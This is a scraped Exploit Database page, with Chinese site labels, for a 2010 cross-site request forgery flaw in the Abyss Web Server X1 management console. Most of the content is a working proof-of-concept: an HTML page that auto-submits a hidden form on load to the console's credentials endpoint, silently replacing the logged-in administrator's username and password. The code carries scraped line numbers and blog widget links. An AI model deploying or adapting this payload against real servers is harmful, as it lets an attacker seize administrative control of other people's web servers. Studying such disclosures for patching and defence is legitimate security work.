Abyss Web Server X1 – Cross-Site Request Forgery

• Exploit Database
• 151 阅读

• 作者： John Leitch
  日期： 2010-05-17
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12640/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  http://osvdb.org/show/osvdb/64693   <http://osvdb.org/show/osvdb/64693> http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html :   Abyss Web Server X1 XSRF<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html> A cross-site request forgery vunlerability in the Abyss Web Server X1<http://www.aprelium.com/abyssws/download.php> management console can be exploited to change both the username and password of the logged in user. PoC: view plain<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#> print<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#> ?<http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html#>   1. <html> 2. <body onload="document.forms[0].submit()"> 3. <form method="post" action=" http://localhost:9999/console/credentials"> 4. <input type="hidden" name="/console/credentials/login" 5.value="new_username" /> 6. <input type="hidden" name= "/console/credentials/password/$pass1" 7.value="new_password" /> 8. <input type="hidden" name= "/console/credentials/password/$pass2" 9.value="new_password" /> 10. <input type="hidden" name="/console/credentials/bok" 11.value="%C2%A0%C2%A0OK%C2%A0%C2%A0" /> 12. </form> 13. </body> 14. </html>   <http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html>